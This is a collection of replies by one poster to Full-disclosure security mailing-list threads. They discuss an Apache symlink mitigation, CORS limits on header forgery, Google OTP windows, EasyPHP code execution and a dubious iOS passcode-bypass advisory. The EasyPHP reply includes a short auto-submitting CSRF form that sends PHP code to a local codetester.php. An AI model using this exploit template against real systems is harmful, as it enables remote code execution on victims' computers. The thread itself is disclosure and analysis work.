Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure

2013-08-07 Thread andfarm
On 2013-08-07, at 09:08, king cope wrote:
> SymLinksIfOwnerMatch will not help in this attack scenario because the
> .htaccess file overwrites this Options directive

AllowOverride can be used to prevent this as well, by specifying a set of values 
for Options that does not include FollowSymLinks, e.g.

AllowOverride AuthConfig FileInfo Indexes Limit 
Options=ExecCGI,Includes,Indexes,MultiViews,SymLinksIfOwnerMatch
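
For instance (a sketch only -- the path is hypothetical, and the option list is 
just one reasonable choice), the same restriction scoped to user webspace might 
look like:

<Directory /home/*/public_html>
    Options SymLinksIfOwnerMatch
    AllowOverride AuthConfig FileInfo Indexes Limit \
        Options=ExecCGI,Includes,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>

With Options= restricted this way, a .htaccess that tries "Options 
+FollowSymLinks" produces a server error instead of silently re-enabling 
symlink following.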

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [DAHAX-2013-001] Cloudflare XSS Vulnerability

2013-08-22 Thread andfarm
On 2013-08-22, at 12:02, Ryan Dewhurst wrote:
> I presume you could use CSRF and then XMLHttpRequest to set the
> X-Forwarded-For and
> User-Agent header.

XMLHttpRequest cannot set those headers for a cross-origin request: User-Agent 
is on the list of headers setRequestHeader must silently ignore, and a custom 
header like X-Forwarded-For would require the target site to approve it in a 
CORS preflight. So you could only attack your own site that way.
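
For reference, here's roughly what the browser does with a cross-origin XHR 
that calls setRequestHeader("X-Forwarded-For", ...) -- host names invented for 
illustration:

    OPTIONS /search HTTP/1.1
    Host: victim.example
    Origin: http://attacker.example
    Access-Control-Request-Method: GET
    Access-Control-Request-Headers: x-forwarded-for

Unless victim.example answers that preflight with a matching 
Access-Control-Allow-Headers, the real request (and the forged header) is never 
sent at all.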


Re: [Full-disclosure] Google vulnerabilities with PoC

2014-03-13 Thread andfarm
On Mar 13, 2014, at 10:33, Brandon Perry wrote:
> If you were evil, you could upload huge blobs and just take up space on the 
> google servers. Who knows what will happen if you upload a couple hundred 
> gigs of files. They dont disappear, they are just unretrievable afaict. It is 
> a security risk in the sense that untrusted data is being persisted 
> *somewhere*.

It's not clear at this point that the uploaded data is even being persisted! 
Since the uploaded file is never made available for download, it's entirely 
possible that it's deleted as soon as Google's video transcoding systems 
discover it isn't a supported video format.

The comments on the Softpedia article are painfully stupid, by the way. I 
recommend not reading them. :)


Re: [Full-disclosure] Security Problem with Google’s 2-Step Authentication

2012-07-30 Thread andfarm
On 2012-07-30, at 07:41, Pablo Ximenes wrote:
> I'd like to share with you one of my findings that failed to get
> Google's Security Reward. Although Google doesn't consider it a
> security problem, some might find it at least amusing if not
> interesting.

From the linked article, http://ximen.es/?p=653 -
> I found out they have a time window of 10 minutes in which any of the 20 OTP 
> passwords are valid. [...] I have suggested invalidating all the time window 
> (all the 20 OTPs) [when a user uses an OTP...]

Invalidating the entire window would make you unable to authenticate with an 
OTP more than once every 10 minutes. In any case, I'm having a hard time 
imagining what sort of threat model would make this necessary -- if you can 
somehow predict a user's OTP code for some point in the future, you could just 
as easily predict one even further in the future (outside the window of 
invalidated codes), and use it when that time arrives.

> or at least they could synchronize accounts.google.com’s watch with the 
> user’s at some point, like some banks do.

Current versions of Google Authenticator have an option to do exactly this. The 
10-minute window seems kind of wide; I'd imagine that it was introduced before 
the time sync option was available, for compatibility with devices that are on 
cell networks with bad time servers.


Re: [Full-disclosure] EasyPHP 12.1 - Remote code execution of any php/js on local PC

2012-12-03 Thread andfarm
On 2012-12-03, at 17:40, Seth Arnold wrote:
> Their documentation is extremely clear that their software should only
> ever be used locally:
> 
> If their webserver binds to anything other than localhost then I'll
> quickly agree that this is a misconfiguration and a security problem.
> 
> But if they do bind to localhost only this seems a bit overhyped.

It's still vulnerable to XSRF even if it only binds to localhost. And, given 
that the vulnerable script codetester.php is at a known location and requires 
no nonce for submissions, it's incredibly straightforward to attack.
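
To make that concrete, a CSRF page could be as simple as the following sketch 
(the URL and field name are guesses -- whatever codetester.php actually listens 
on and reads the submitted code from):

    <form action="http://localhost/codetester.php" method="POST" id="csrf">
      <input type="hidden" name="code" value="phpinfo();">
    </form>
    <script>document.getElementById("csrf").submit();</script>

The same-origin policy doesn't stop the browser from *sending* this POST to 
localhost; the attacker never needs to read the response, because the payload 
has already executed by then.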


Re: [Full-disclosure] Apple iOS v6.1 (10B143) - Code Lock Bypass Vulnerability #2

2013-02-18 Thread andfarm
On 2013-02-17, at 17:21, Vulnerability Lab wrote:
> A code lock bypass vulnerability via iOS as glitch is detected in the
> official Apple iOS v6.1 (10B143) for iPad & iPhone.

Did you actually test the exploit on the iPad? I'm guessing you didn't, because 
the iPad has no emergency call function (nor, for that matter, any phone 
functionality at all).


> The vulnerability allows an attacker with physical access to bypass via a
> glitch in the iOS kernel the main device code lock (auth).

What makes you think the kernel is involved? SpringBoard seems a much more 
likely candidate, since it's what actually handles the passcode lock screen.

Also, the term you are looking for here is "passcode lock". Not "code lock", 
nor "auth".


> The vulnerability is located in the main login module of the mobile iOS
> device (iphone or ipad)

Wait a minute, now it's an issue with the "main login module", not the kernel? 
Can you identify what application or framework this module is part of?

OK, let's just be honest here. Did you actually locate any code which is 
responsible for allowing this exploit to work, or are you just guessing?


> The vulnerability can be exploited by local attackers with physical device
> access without privileged iOS account or required user interaction.

Oh boy, this one is giving me hives.

1. A "local attacker" is usually implied to have physical access, *especially* 
to a handheld device. If they didn't, they'd be a remote attacker.

2. iOS doesn't really have accounts, let alone "privileged" ones.

3. The exploit is composed entirely of user interactions. Saying that "the 
vulnerability can be exploited [...without...] required user interaction" is 
completely, utterly, totally wrong.

Hell, this whole sentence says almost nothing. It's all implied by a 
non-logorrheic description of the exploit, like "we found a way to get an 
iPhone to sync with a computer without entering the passcode".


I haven't tested the exploit myself yet, but the first step makes me wonder:

> 0.  Connect your device with itunes and the appstore to make sure the code 
> lock is activated

If you've previously connected the phone to the computer, you don't need to 
unlock the device to sync it. Am I misreading this step, or do all the 
following steps just lead up to a perfectly ordinary sync?
